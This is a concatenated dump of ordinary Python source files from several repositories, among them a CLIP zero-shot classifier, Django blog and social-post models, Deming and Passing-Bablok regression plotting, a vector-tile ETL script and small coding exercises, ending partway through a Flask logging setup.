] | null | null | null | sample/sample.py | eaybek/getthat | 3ca34902f773ec6a40a1df0b7dac5845a22cc8e4 | [
"MIT"
] | null | null | null | from getthat import getthat
# from sna.search import Sna
Sna = getthat("sna.search", "Sna")
sna = Sna()
| 12 | 34 | 0.685185 |
c93c9aaedb099246f931a93b0f3660c7f68b5819 | 2,481 | py | Python | src/models/zeroshot.py | mmatena/wise-ft | 2630c366d252ad32db82ea886f7ab6a752142792 | [
"MIT"
] | 79 | 2021-10-01T22:29:51.000Z | 2022-03-30T04:19:58.000Z | src/models/zeroshot.py | mmatena/wise-ft | 2630c366d252ad32db82ea886f7ab6a752142792 | [
"MIT"
] | 2 | 2021-11-18T19:50:59.000Z | 2022-01-08T00:57:24.000Z | src/models/zeroshot.py | mmatena/wise-ft | 2630c366d252ad32db82ea886f7ab6a752142792 | [
"MIT"
] | 10 | 2021-10-14T18:29:59.000Z | 2022-03-27T12:40:18.000Z | import os
import torch
from tqdm import tqdm
import numpy as np
import clip.clip as clip
import src.templates as templates
import src.datasets as datasets
from src.args import parse_arguments
from src.models.modeling import ClassificationHead, ImageEncoder, ImageClassifier
from src.models.eval import evaluate
def get_zeroshot_classifier(args, clip_model):
assert args.template is not None
assert args.train_dataset is not None
template = getattr(templates, args.template)
logit_scale = clip_model.logit_scale
dataset_class = getattr(datasets, args.train_dataset)
dataset = dataset_class(
None,
location=args.data_location,
batch_size=args.batch_size,
classnames=args.classnames
)
device = args.device
clip_model.eval()
clip_model.to(device)
print('Getting zeroshot weights.')
with torch.no_grad():
zeroshot_weights = []
for classname in tqdm(dataset.classnames):
texts = []
for t in template:
texts.append(t(classname))
texts = clip.tokenize(texts).to(device) # tokenize
embeddings = clip_model.encode_text(texts) # embed with text encoder
embeddings /= embeddings.norm(dim=-1, keepdim=True)
embeddings = embeddings.mean(dim=0, keepdim=True)
embeddings /= embeddings.norm()
zeroshot_weights.append(embeddings)
zeroshot_weights = torch.stack(zeroshot_weights, dim=0).to(device)
zeroshot_weights = torch.transpose(zeroshot_weights, 0, 2)
zeroshot_weights *= logit_scale.exp()
zeroshot_weights = zeroshot_weights.squeeze().float()
zeroshot_weights = torch.transpose(zeroshot_weights, 0, 1)
classification_head = ClassificationHead(normalize=True, weights=zeroshot_weights)
return classification_head
def eval(args):
args.freeze_encoder = True
if args.load is not None:
classifier = ImageClassifier.load(args.load)
else:
image_encoder = ImageEncoder(args, keep_lang=True)
classification_head = get_zeroshot_classifier(args, image_encoder.model)
delattr(image_encoder.model, 'transformer')
classifier = ImageClassifier(image_encoder, classification_head, process_images=False)
evaluate(classifier, args)
if args.save is not None:
classifier.save(args.save)
if __name__ == '__main__':
args = parse_arguments()
eval(args) | 30.62963 | 94 | 0.694478 |
c93cab934e2e3f25cd7169e11400beb6e6d43570 | 425 | py | Python | app/main/__init__.py | csmcallister/beular | 219bcd552c1303eb0557f3ef56d44355a932399e | [
"CNRI-Python"
] | null | null | null | app/main/__init__.py | csmcallister/beular | 219bcd552c1303eb0557f3ef56d44355a932399e | [
"CNRI-Python"
] | null | null | null | app/main/__init__.py | csmcallister/beular | 219bcd552c1303eb0557f3ef56d44355a932399e | [
"CNRI-Python"
] | null | null | null | from flask import Blueprint
bp = Blueprint('main', __name__)
@bp.after_app_request
def after_request(response):
"""Cache Bust
"""
cache_cont = "no-cache, no-store, must-revalidate, public, max-age=0"
response.headers["Cache-Control"] = cache_cont
response.headers["Expires"] = 0
response.headers["Pragma"] = "no-cache"
return response
from app.main import routes # noqa: F401 | 25 | 74 | 0.665882 |
c94067f14edbfaeef67d40e03949c3cc7bd61802 | 734 | py | Python | blog/models.py | sd5682295/course_demo-master-2fe2955bdcb6985c2b48bb3487da5732c395bbc2 | face6e8d4e6cc61c3ef437142b71639393de3bf8 | [
"MIT"
] | null | null | null | blog/models.py | sd5682295/course_demo-master-2fe2955bdcb6985c2b48bb3487da5732c395bbc2 | face6e8d4e6cc61c3ef437142b71639393de3bf8 | [
"MIT"
] | null | null | null | blog/models.py | sd5682295/course_demo-master-2fe2955bdcb6985c2b48bb3487da5732c395bbc2 | face6e8d4e6cc61c3ef437142b71639393de3bf8 | [
"MIT"
] | null | null | null | from django.db import models
from django.contrib.auth.models import User
class Category(models.Model):
name = models.CharField(max_length=100)
def __str__(self):
return self.name
class Tag(models.Model):
name = models.CharField(max_length=100)
def __str__(self):
return self.name
class Post(models.Model):
title = models.CharField(max_length=80)
subtitle = models.CharField(max_length=80)
publish_date = models.DateTimeField()
content = models.TextField()
link = models.CharField(max_length=100)
author = models.ForeignKey(User, on_delete=models.CASCADE)
category = models.ForeignKey(Category, on_delete=models.CASCADE)
tag = models.ManyToManyField(Tag, blank=True)
def __str__(self):
return self.title
| 22.9375 | 65 | 0.76703 |
c94170821cd5e437201c56213668e61ba65bc8e5 | 21,018 | py | Python | methcomp/regression.py | daneishdespot/methcomp | 767d85aa56a8fda372847585decca8879ec2ac98 | [
"MIT"
] | null | null | null | methcomp/regression.py | daneishdespot/methcomp | 767d85aa56a8fda372847585decca8879ec2ac98 | [
"MIT"
] | null | null | null | methcomp/regression.py | daneishdespot/methcomp | 767d85aa56a8fda372847585decca8879ec2ac98 | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
import pandas as pd
import scipy.stats as st
import statsmodels.api as sm
import math
import numpy as np
__all__ = ["deming", "passingbablok", "linear"]
class _Deming(object):
"""Internal class for drawing a Deming regression plot"""
def __init__(self, method1, method2,
vr, sdr, bootstrap,
x_label, y_label, title,
CI, line_reference, line_CI, legend,
color_points, color_deming,
point_kws):
self.method1: np.array = np.asarray(method1)
self.method2: np.array = np.asarray(method2)
self.vr = vr
self.sdr = sdr
self.bootstrap = bootstrap
self.x_title = x_label
self.y_title = y_label
self.graph_title = title
self.color_points = color_points
self.color_deming = color_deming
self.CI = CI
self.line_reference = line_reference
self.line_CI = line_CI
self.legend = legend
self.point_kws = {} if point_kws is None else point_kws.copy()
self._check_params()
self._derive_params()
def _check_params(self):
if len(self.method1) != len(self.method2):
raise ValueError('Length of method 1 and method 2 are not equal.')
if self.bootstrap is not None and not isinstance(self.bootstrap, int):
raise ValueError('Bootstrap argument should either be None or an integer.')
if self.CI is not None and (self.CI > 1 or self.CI < 0):
raise ValueError('Confidence interval must be between 0 and 1.')
if any([not isinstance(x, str) for x in [self.x_title, self.y_title]]):
raise ValueError('Axes labels arguments should be provided as a str.')
def _derive_params(self):
def _deming(x, y, lamb):
ssdx = np.var(x, ddof=1) * (self.n - 1)
ssdy = np.var(y, ddof=1) * (self.n - 1)
spdxy = np.cov(x, y)[1][1] * (self.n - 1)
beta = (ssdy - lamb * ssdx + math.sqrt((ssdy - lamb * ssdx) ** 2 + 4 * lamb * (ssdy ** 2))) / (
2 * spdxy)
alpha = y.mean() - beta * x.mean()
ksi = (lamb * x + beta * (y - alpha)) / (lamb + beta ** 2)
sigmax = lamb * sum((x - ksi) ** 2) + sum((y - alpha - beta * ksi) ** 2) / (
(self.n - 2) * beta)
sigmay = math.sqrt(lamb * sigmax)
sigmax = math.sqrt(sigmax)
return alpha, beta, sigmax, sigmay
self.n = len(self.method1)
if self.vr is not None:
_lambda = self.vr
elif self.sdr is not None:
_lambda = self.sdr
else:
_lambda = 1
params = _deming(self.method1, self.method2, _lambda)
if self.bootstrap is None:
self.alpha = params[0]
self.beta = params[1]
self.sigmax = params[2]
self.sigmay = params[3]
else:
_params = np.zeros([self.bootstrap, 4])
for i in range(self.bootstrap):
idx = np.random.choice(range(self.n), self.n, replace=True)
_params[i] = _deming(np.take(self.method1, idx), np.take(self.method2, idx), _lambda)
_paramsdf = pd.DataFrame(_params, columns=['alpha', 'beta', 'sigmax', 'sigmay'])
se = np.sqrt(np.diag(np.cov(_paramsdf.cov())))
t = np.transpose(
np.apply_along_axis(np.quantile, 0, _params, [0.5, (1 - self.CI) / 2, 1 - (1 - self.CI) / 2]))
self.alpha = [t[0][0], se[0], t[0][1], t[0][2]]
self.beta = [t[1][0], se[1], t[0][1], t[0][2]]
self.sigmax = [t[2][0], se[2], t[0][1], t[0][2]]
self.sigmay = [t[3][0], se[3], t[0][1], t[0][2]]
def plot(self, ax):
# plot individual points
ax.scatter(self.method1, self.method2, s=20, alpha=0.6, color=self.color_points)
# plot reference line
if self.line_reference:
ax.plot([0, 1], [0, 1], label='Reference',
color='grey', linestyle='--', transform=ax.transAxes)
# plot Deming-line
_xvals = np.array(ax.get_xlim())
if self.bootstrap is None:
_yvals = self.alpha + self.beta * _xvals
ax.plot(_xvals, _yvals, label=f'{self.alpha:.2f} + {self.beta:.2f} * Method 1',
color=self.color_deming, linestyle='-')
else:
_yvals = [self.alpha[s] + self.beta[0] * _xvals for s in range(0, 4)]
ax.plot(_xvals, _yvals[0], label=f'{self.alpha[0]:.2f} + {self.beta[0]:.2f} * Method 1',
color=self.color_deming, linestyle='-')
ax.fill_between(_xvals, _yvals[2], _yvals[3], color=self.color_deming, alpha=0.2)
if self.line_CI:
ax.plot(_xvals, _yvals[2], linestyle='--')
ax.plot(_xvals, _yvals[3], linestyle='--')
if self.legend:
ax.legend(loc='upper left', frameon=False)
ax.set_ylabel(self.y_title)
ax.set_xlabel(self.x_title)
if self.graph_title is not None:
ax.set_title(self.graph_title)
def deming(method1, method2,
vr=None, sdr=None, bootstrap=1000,
x_label='Method 1', y_label='Method 2', title=None,
CI=0.95, line_reference=True, line_CI=False, legend=True,
color_points='#000000', color_deming='#008bff',
point_kws=None,
square=False, ax=None):
"""Provide a method comparison using Deming regression.
This is an Axis-level function which will draw the Deming plot
onto the current active Axis object unless ``ax`` is provided.
Parameters
----------
method1, method2 : array, or list
Values obtained from both methods, preferably provided in a np.array.
vr : float
The assumed known ratio of the (residual) variance of the ys relative to that of the xs.
Defaults to 1.
sdr : float
The assumed known standard deviations. Parameter vr takes precedence if both are given.
Defaults to 1.
bootstrap : int or None
Amount of bootstrap estimates that should be performed to acquire standard errors (and confidence
intervals). If None, no bootstrapping is performed. Defaults to 1000.
x_label : str, optional
The label which is added to the X-axis. If None is provided, a standard
label will be added.
y_label : str, optional
The label which is added to the Y-axis. If None is provided, a standard
label will be added.
title : str, optional
Title of the plot. If None is provided, no title will be plotted.
CI : float, optional
The confidence interval employed in Deming line. Defaults to 0.95.
line_reference : bool, optional
If True, a grey reference line at y=x will be plotted in the plot.
Defaults to true.
line_CI : bool, optional
If True, dashed lines will be plotted at the boundaries of the confidence intervals.
Defaults to false.
legend : bool, optional
If True, will provide a legend containing the computed Deming equation.
Defaults to true.
color_points : str, optional
Color of the individual differences that will be plotted.
Color should be provided in format compatible with matplotlib.
color_deming : str, optional
Color of the mean difference line that will be plotted.
Color should be provided in format compatible with matplotlib.
square : bool, optional
If True, set the Axes aspect to "equal" so each cell will be
square-shaped.
point_kws : dict of key, value mappings, optional
Additional keyword arguments for `plt.scatter`.
ax : matplotlib Axes, optional
Axes in which to draw the plot, otherwise use the currently-active
Axes.
Returns
-------
ax : matplotlib Axes
Axes object with the Deming plot.
See Also
-------
Koopmans, T. C. (1937). Linear regression analysis of economic time series. DeErven F. Bohn, Haarlem, Netherlands.
Deming, W. E. (1943). Statistical adjustment of data. Wiley, NY (Dover Publications edition, 1985).
"""
plotter: _Deming = _Deming(method1, method2,
vr, sdr, bootstrap,
x_label, y_label, title,
CI, line_reference, line_CI, legend,
color_points, color_deming,
point_kws)
# Draw the plot and return the Axes
if ax is None:
ax = plt.gca()
if square:
ax.set_aspect('equal')
plotter.plot(ax)
return ax
class _PassingBablok(object):
"""Internal class for drawing a Passing-Bablok regression plot"""
def __init__(self, method1, method2,
x_label, y_label, title,
CI, line_reference, line_CI, legend,
color_points, color_paba,
point_kws):
self.method1: np.array = np.asarray(method1)
self.method2: np.array = np.asarray(method2)
self.x_title = x_label
self.y_title = y_label
self.graph_title = title
self.CI = CI
self.color_points = color_points
self.color_paba = color_paba
self.line_reference = line_reference
self.line_CI = line_CI
self.legend = legend
self.point_kws = {} if point_kws is None else point_kws.copy()
self._check_params()
self._derive_params()
def _check_params(self):
if len(self.method1) != len(self.method2):
raise ValueError('Length of method 1 and method 2 are not equal.')
if self.CI is not None and (self.CI > 1 or self.CI < 0):
raise ValueError('Confidence interval must be between 0 and 1.')
if any([not isinstance(x, str) for x in [self.x_title, self.y_title]]):
raise ValueError('Axes labels arguments should be provided as a str.')
def _derive_params(self):
self.n = len(self.method1)
self.sv = []
for i in range(self.n - 1):
for j in range(i + 1, self.n):
self.sv.append((self.method2[i] - self.method2[j]) /
(self.method1[i] - self.method1[j]))
self.sv.sort()
n = len(self.sv)
k = math.floor(len([a for a in self.sv if a < 0]) / 2)
if n % 2 == 1:
self.slope = self.sv[int((n + 1) / k + 2)]
else:
self.slope = math.sqrt(self.sv[int(n / 2 + k)] * self.sv[int(n / 2 + k + 1)])
_ci = st.norm.ppf(1 - (1 - self.CI) / 2) * math.sqrt((self.n * (self.n - 1) * (2 * self.n + 5)) / 18)
_m1 = int(round((n - _ci) / 2))
_m2 = n - _m1 - 1
self.slope = [self.slope, self.sv[k + _m1], self.sv[k + _m2]]
self.intercept = [np.median(self.method2 - self.slope[0] * self.method1),
np.median(self.method2 - self.slope[1] * self.method1),
np.median(self.method2 - self.slope[2] * self.method1)]
def plot(self, ax):
# plot individual points
ax.scatter(self.method1, self.method2, s=20, alpha=0.6, color=self.color_points,
**self.point_kws)
# plot reference line
if self.line_reference:
ax.plot([0, 1], [0, 1], label='Reference',
color='grey', linestyle='--', transform=ax.transAxes)
# plot PaBa-line
_xvals = np.array(ax.get_xlim())
_yvals = [self.intercept[s] + self.slope[s] * _xvals for s in range(0, 3)]
ax.plot(_xvals, _yvals[0], label=f'{self.intercept[0]:.2f} + {self.slope[0]:.2f} * Method 1',
color=self.color_paba, linestyle='-')
ax.fill_between(_xvals, _yvals[1], _yvals[2], color=self.color_paba, alpha=0.2)
if self.line_CI:
ax.plot(_xvals, _yvals[1], linestyle='--')
ax.plot(_xvals, _yvals[2], linestyle='--')
if self.legend:
ax.legend(loc='upper left', frameon=False)
ax.set_ylabel(self.y_title)
ax.set_xlabel(self.x_title)
if self.graph_title is not None:
ax.set_title(self.graph_title)
def passingbablok(method1, method2,
x_label='Method 1', y_label='Method 2', title=None,
CI=0.95, line_reference=True, line_CI=False, legend=True,
color_points='#000000', color_paba='#008bff',
point_kws=None,
square=False, ax=None):
"""Provide a method comparison using Passing-Bablok regression.
This is an Axis-level function which will draw the Passing-Bablok plot
onto the current active Axis object unless ``ax`` is provided.
Parameters
----------
method1, method2 : array, or list
Values obtained from both methods, preferably provided in a np.array.
x_label : str, optional
The label which is added to the X-axis. If None is provided, a standard
label will be added.
y_label : str, optional
The label which is added to the Y-axis. If None is provided, a standard
label will be added.
title : str, optional
Title of the Passing-Bablok plot. If None is provided, no title will be plotted.
CI : float, optional
The confidence interval employed in the passing-bablok line. Defaults to 0.95.
line_reference : bool, optional
If True, a grey reference line at y=x will be plotted in the plot.
Defaults to true.
line_CI : bool, optional
If True, dashed lines will be plotted at the boundaries of the confidence intervals.
Defaults to false.
legend : bool, optional
If True, will provide a legend containing the computed Passing-Bablok equation.
Defaults to true.
color_points : str, optional
Color of the individual differences that will be plotted.
Color should be provided in format compatible with matplotlib.
color_paba : str, optional
Color of the mean difference line that will be plotted.
Color should be provided in format compatible with matplotlib.
square : bool, optional
If True, set the Axes aspect to "equal" so each cell will be
square-shaped.
point_kws : dict of key, value mappings, optional
Additional keyword arguments for `plt.scatter`.
ax : matplotlib Axes, optional
Axes in which to draw the plot, otherwise use the currently-active
Axes.
Returns
-------
ax : matplotlib Axes
Axes object with the Passing-Bablok plot.
See Also
-------
Passing H and Bablok W. J Clin Chem Clin Biochem, vol. 21, no. 11, 1983, pp. 709 - 720
"""
plotter: _PassingBablok = _PassingBablok(method1, method2,
x_label, y_label, title,
CI, line_reference, line_CI, legend,
color_points, color_paba,
point_kws)
# Draw the plot and return the Axes
if ax is None:
ax = plt.gca()
if square:
ax.set_aspect('equal')
plotter.plot(ax)
return ax
class _Linear(object):
"""Internal class for drawing a simple, linear regression plot"""
def __init__(self, method1, method2,
x_label, y_label, title,
CI, line_reference, line_CI, legend,
color_points, color_regr,
point_kws):
self.method1: np.array = np.asarray(method1)
self.method2: np.array = np.asarray(method2)
self.x_title = x_label
self.y_title = y_label
self.graph_title = title
self.CI = CI
self.color_points = color_points
self.color_regr = color_regr
self.line_reference = line_reference
self.line_CI = line_CI
self.legend = legend
self.point_kws = {} if point_kws is None else point_kws.copy()
self._check_params()
self._derive_params()
def _check_params(self):
if len(self.method1) != len(self.method2):
raise ValueError('Length of method 1 and method 2 are not equal.')
if self.CI is not None and (self.CI > 1 or self.CI < 0):
raise ValueError('Confidence interval must be between 0 and 1.')
if any([not isinstance(x, str) for x in [self.x_title, self.y_title]]):
raise ValueError('Axes labels arguments should be provided as a str.')
def _derive_params(self):
self.n = len(self.method1)
_model = sm.OLS(self.method1, sm.add_constant(self.method2)).fit()
_params = _model.params
_confint = _model.conf_int(alpha=self.CI)
self.intercept = [_confint[0][0], _params[0], _confint[0][1]]
self.slope = [_confint[1][0], _params[1], _confint[1][1]]
def plot(self, ax):
# plot individual points
ax.scatter(self.method1, self.method2, s=20, alpha=0.6, color=self.color_points,
**self.point_kws)
# plot reference line
if self.line_reference:
ax.plot([0, 1], [0, 1], label='Reference',
color='grey', linestyle='--', transform=ax.transAxes)
# plot linear regression
_xvals = np.array(ax.get_xlim())
_yvals = [self.intercept[s] + self.slope[s] * _xvals for s in range(0, 3)]
ax.plot(_xvals, _yvals[0], label=f'{self.intercept[0]:.2f} + {self.slope[0]:.2f} * Method 1',
color=self.color_regr, linestyle='-')
ax.fill_between(_xvals, _yvals[1], _yvals[2], color=self.color_regr, alpha=0.2)
if self.line_CI:
ax.plot(_xvals, _yvals[1], linestyle='--')
ax.plot(_xvals, _yvals[2], linestyle='--')
if self.legend:
ax.legend(loc='upper left', frameon=False)
ax.set_ylabel(self.y_title)
ax.set_xlabel(self.x_title)
if self.graph_title is not None:
ax.set_title(self.graph_title)
def linear(method1, method2,
x_label='Method 1', y_label='Method 2', title=None,
CI=0.95, line_reference=True, line_CI=False, legend=True,
color_points='#000000', color_regr='#008bff',
point_kws=None,
square=False, ax=None):
"""Provide a method comparison using simple, linear regression.
This is an Axis-level function which will draw the linear regression plot
onto the current active Axis object unless ``ax`` is provided.
Parameters
----------
method1, method2 : array, or list
Values obtained from both methods, preferably provided in a np.array.
x_label : str, optional
The label which is added to the X-axis. If None is provided, a standard
label will be added.
y_label : str, optional
The label which is added to the Y-axis. If None is provided, a standard
label will be added.
title : str, optional
Title of the linear regression plot. If None is provided, no title will be plotted.
CI : float, optional
The confidence interval employed in the linear regression line. Defaults to 0.95.
line_reference : bool, optional
If True, a grey reference line at y=x will be plotted in the plot.
Defaults to true.
line_CI : bool, optional
If True, dashed lines will be plotted at the boundaries of the confidence intervals.
Defaults to false.
legend : bool, optional
If True, will provide a legend containing the computed Linear regression equation.
Defaults to true.
color_points : str, optional
Color of the individual differences that will be plotted.
Color should be provided in format compatible with matplotlib.
color_paba : str, optional
Color of the mean difference line that will be plotted.
Color should be provided in format compatible with matplotlib.
square : bool, optional
If True, set the Axes aspect to "equal" so each cell will be
square-shaped.
point_kws : dict of key, value mappings, optional
Additional keyword arguments for `plt.scatter`.
ax : matplotlib Axes, optional
Axes in which to draw the plot, otherwise use the currently-active
Axes.
Returns
-------
ax : matplotlib Axes
Axes object with the linear regression plot.
See Also
-------
..............
"""
plotter: _Linear = _Linear(method1, method2,
x_label, y_label, title,
CI, line_reference, line_CI, legend,
color_points, color_regr,
point_kws)
# Draw the plot and return the Axes
if ax is None:
ax = plt.gca()
if square:
ax.set_aspect('equal')
plotter.plot(ax)
return ax
| 39.433396 | 118 | 0.591683 |
c9418c993a05d0182f414df4de245fd5f5288aa8 | 1,470 | py | Python | setup.py | jmacgrillen/perspective | 6e6e833d8921c54c907dd6314d4bc02ba3a3c0b6 | [
"MIT"
] | null | null | null | setup.py | jmacgrillen/perspective | 6e6e833d8921c54c907dd6314d4bc02ba3a3c0b6 | [
"MIT"
] | null | null | null | setup.py | jmacgrillen/perspective | 6e6e833d8921c54c907dd6314d4bc02ba3a3c0b6 | [
"MIT"
] | null | null | null | #! /usr/bin/env python -*- coding: utf-8 -*-
"""
Name:
setup.py
Desscription:
Install the maclib package.
Version:
1 - Inital release
Author:
J.MacGrillen <macgrillen@gmail.com>
Copyright:
Copyright (c) John MacGrillen. All rights reserved.
"""
from setuptools import setup, find_packages
with open("README.md", "r") as fh:
long_description = fh.read()
install_requirements = [
"maclib",
"opencv-python",
"numpy",
"Pillow",
"charset-normalizer"
]
def setup_perspective_package() -> None:
"""
Install and configure Perspective for use
"""
setup(
name='Perspective',
version="0.0.1",
description='Analyse images using the range of tools provided',
long_description=long_description,
author='J.MacGrillen',
scripts=[],
packages=find_packages(exclude=['tests*']),
include_package_data=True,
install_requires=install_requirements,
license="MIT License",
python_requires=">= 3.7.*",
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
],
)
if __name__ == "__main__":
setup_perspective_package()
| 25.344828 | 71 | 0.593197 |
c941a3a73b37c420856313d2ddda37d278df3e52 | 1,021 | py | Python | 2021/day2.py | MadsPoder/advent-of-code | 4f190e18d24332e21308a7d251c331777b52a5f1 | [
"MIT"
] | 2 | 2019-12-02T22:27:59.000Z | 2019-12-04T07:48:27.000Z | 2021/day2.py | MadsPoder/advent-of-code | 4f190e18d24332e21308a7d251c331777b52a5f1 | [
"MIT"
] | null | null | null | 2021/day2.py | MadsPoder/advent-of-code | 4f190e18d24332e21308a7d251c331777b52a5f1 | [
"MIT"
] | null | null | null | # Playing with pattern matching in python 3.10
# Add lambda to parse commands into command and corresponding units
parse_command = lambda x, y: (x, int(y))
# Read puzzle input
with open ('day2.txt') as fp:
commands = [parse_command(*x.strip().split(' ')) for x in fp.readlines()]
horizontal_position = 0
depth = 0
for command in commands:
match command:
case ['forward', units]:
horizontal_position = horizontal_position + units
case ['down', units]:
depth = depth + units
case ['up', units]:
depth = depth - units
# Part 1
print(depth * horizontal_position)
# Part 2
aim = 0
horizontal_position = 0
depth = 0
for command in commands:
match command:
case ['forward', units]:
horizontal_position = horizontal_position + units
depth = depth + (aim * units)
case ['down', units]:
aim = aim + units
case ['up', units]:
aim = aim - units
print(depth * horizontal_position) | 25.525 | 77 | 0.613124 |
c943169325309fd0984d9e08fbc50df17f771916 | 2,159 | py | Python | etl/vector/process_all.py | nismod/oi-risk-vis | a5c7460a8060a797dc844be95d5c23689f42cd17 | [
"MIT"
] | 2 | 2020-09-29T15:52:48.000Z | 2021-03-31T02:58:53.000Z | etl/vector/process_all.py | nismod/oi-risk-vis | a5c7460a8060a797dc844be95d5c23689f42cd17 | [
"MIT"
] | 41 | 2021-05-12T17:12:14.000Z | 2022-03-17T10:49:20.000Z | etl/vector/process_all.py | nismod/infra-risk-vis | 1e5c28cced578d8bd9c78699e9038ecd66f47cf7 | [
"MIT"
] | null | null | null | #!/bin/env python3
from argparse import ArgumentParser
import csv
import os
from pathlib import Path
import subprocess
import sys
this_directory = Path(__file__).parent.resolve()
vector_script_path = this_directory / 'prepare_vector.sh'
def run_single_processing(in_file_path: Path, out_file_path: Path, layer_name: str, output_layer_name: str, spatial_type: str, where_filter: str, **kwargs):
print(f'Processing vector "{in_file_path}" -> "{out_file_path}"')
command = f'{vector_script_path} "{in_file_path}" "{out_file_path}" "{output_layer_name}" "{spatial_type}" "{layer_name}" "{where_filter}"'
print(f"Running command: {command}", flush=True)
subprocess.run(command, shell=True, stdout=sys.stdout, stderr=sys.stderr)
def process_vector_datasets(raw: Path, out: Path):
infrastructure_dir = raw / 'networks'
csv_path = infrastructure_dir / 'network_layers.csv'
assert csv_path.is_file(), f"{csv_path} is not a file"
with csv_path.open() as f:
reader = csv.DictReader(f)
assert 'path' in reader.fieldnames
assert 'layer_name' in reader.fieldnames
assert 'spatial_type' in reader.fieldnames
assert 'where_filter' in reader.fieldnames
assert 'output_layer_name' in reader.fieldnames
for row in reader:
in_file_path = raw / row['path']
output_layer_name = row['output_layer_name']
out_file_path = out / f"{output_layer_name}.mbtiles"
if os.path.exists(out_file_path) and (os.path.getmtime(in_file_path) < os.path.getmtime(out_file_path)):
print("Skipping", out_file_path)
continue
run_single_processing(in_file_path, out_file_path, **row)
if __name__ == '__main__':
parser = ArgumentParser(description='Converts all vector datasets to GeoJSON and then to MBTILES')
parser.add_argument('--raw', type=Path, help='Root of the raw data directory. Assumes a file network_layers.csv exists in the dir.', required=True)
parser.add_argument('--out', type=Path, help='Directory in which to store results of the processing', required=True)
args = parser.parse_args()
process_vector_datasets(args.raw.expanduser().resolve(), args.out.expanduser().resolve())
| 41.519231 | 156 | 0.742937 |
c944a392c3c65b876eac48378aa9aaaa59c4cea9 | 1,688 | py | Python | django/week9/main/models.py | yrtby/Alotech-Fullstack-Bootcamp-Patika | e2fd775e2540b8d9698dcb7dc38f84a6d7912e8d | [
"MIT"
] | 1 | 2021-11-05T09:45:25.000Z | 2021-11-05T09:45:25.000Z | django/week9/main/models.py | yrtby/Alotech-Fullstack-Bootcamp-Patika | e2fd775e2540b8d9698dcb7dc38f84a6d7912e8d | [
"MIT"
] | null | null | null | django/week9/main/models.py | yrtby/Alotech-Fullstack-Bootcamp-Patika | e2fd775e2540b8d9698dcb7dc38f84a6d7912e8d | [
"MIT"
] | 3 | 2021-11-07T07:16:30.000Z | 2021-12-07T20:22:59.000Z | from django.db import models
from django.contrib.auth.models import User
from django.core.validators import MinLengthValidator
# Create your models here.
class Post(models.Model):
image = models.ImageField(upload_to='uploads/')
content = models.TextField(max_length=200, validators=[MinLengthValidator(10)])
author = models.ForeignKey(User, on_delete=models.CASCADE)
created_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return f"Post '{self.content}' shared by '{self.author.username}'"
@property
def likes_count(self):
if hasattr(self, '_likes_count'):
return self.like_set.count()
self._likes_count = self.like_set.count()
return self.like_set.count()
@property
def comments_count(self):
if hasattr(self, '_comments_count'):
return self.comment_set.count()
self._comments_count = self.comment_set.count()
return self.comment_set.count()
class Like(models.Model):
post = models.ForeignKey(Post, on_delete=models.CASCADE)
user = models.ForeignKey(User, on_delete=models.CASCADE)
created_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return f"Post '{self.post.content}' liked by '{self.user.username}'"
class Comment(models.Model):
post = models.ForeignKey(Post, on_delete=models.CASCADE)
user = models.ForeignKey(User, on_delete=models.CASCADE)
content = models.TextField(max_length=200, validators=[MinLengthValidator(10)])
created_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return f"Post '{self.post.content}' commented by '{self.user.username}'"
| 35.914894 | 83 | 0.708531 |
c9463207e60b37b4cf9f338b3635a5669f81cf71 | 286 | py | Python | codewars/6kyu/dinamuh/CountingDuplicates/main.py | dinamuh/Training_one | d18e8fb12608ce1753162c20252ca928c4df97ab | [
"MIT"
] | null | null | null | codewars/6kyu/dinamuh/CountingDuplicates/main.py | dinamuh/Training_one | d18e8fb12608ce1753162c20252ca928c4df97ab | [
"MIT"
] | 2 | 2019-01-22T10:53:42.000Z | 2019-01-31T08:02:48.000Z | codewars/6kyu/dinamuh/CountingDuplicates/main.py | dinamuh/Training_one | d18e8fb12608ce1753162c20252ca928c4df97ab | [
"MIT"
] | 13 | 2019-01-22T10:37:42.000Z | 2019-01-25T13:30:43.000Z | def duplicate_count(text):
x = set()
y = set()
for char in text:
char = char.lower()
if char in x:
y.add(char)
x.add(char)
return len(y)
def duplicate_count2(s):
return len([c for c in set(s.lower()) if s.lower().count(c) > 1])
| 20.428571 | 69 | 0.527972 |
c947e59db3be68e0dcce4600b6cfeb33b848886c | 375 | py | Python | tests/test_dir_dataset.py | gimlidc/igre | bf3425e838cca3d1fa8254a2550ecb44774ee0ef | [
"MIT"
] | 1 | 2021-09-24T09:12:06.000Z | 2021-09-24T09:12:06.000Z | tests/test_dir_dataset.py | gimlidc/igre | bf3425e838cca3d1fa8254a2550ecb44774ee0ef | [
"MIT"
] | null | null | null | tests/test_dir_dataset.py | gimlidc/igre | bf3425e838cca3d1fa8254a2550ecb44774ee0ef | [
"MIT"
] | null | null | null | import stable.modalities.dir_dataset as dataset
import os.path
def test_load_all_images():
srcdir = os.path.join("tests", "assets")
data, metadata = dataset.load_all_images(srcdir)
assert metadata["resolutions"] == [(125, 140)]
assert data[0].shape[2] == 2
assert metadata["filenames"][0] == ["mari_magdalena-detail.png", "mari_magdalenaIR-detail.png"]
| 34.090909 | 99 | 0.706667 |
c949f74729063705c3b6e636bb65a45813ce66bb | 1,118 | py | Python | sample/main.py | qjw/flasgger | d43644da1fea6af596ff0e2f11517b578377850f | [
"MIT"
] | 5 | 2018-03-07T03:54:36.000Z | 2022-01-01T04:43:48.000Z | sample/main.py | qjw/flasgger | d43644da1fea6af596ff0e2f11517b578377850f | [
"MIT"
] | null | null | null | sample/main.py | qjw/flasgger | d43644da1fea6af596ff0e2f11517b578377850f | [
"MIT"
] | 2 | 2021-11-11T08:48:39.000Z | 2022-01-01T04:43:49.000Z | import logging
import jsonschema
from flask import Flask, jsonify
from flask import make_response
from flasgger import Swagger
from sample.config import Config
def init_logging(app):
handler = logging.StreamHandler()
handler.setLevel(logging.INFO)
handler.setFormatter(logging.Formatter(
'%(asctime)s %(levelname)s [%(pathname)s:%(lineno)s] - %(message)s'))
app.logger.setLevel(logging.INFO)
app.logger.addHandler(handler)
if app.debug:
sa_logger = logging.getLogger('sqlalchemy.engine')
sa_logger.setLevel(logging.INFO)
sa_logger.addHandler(handler)
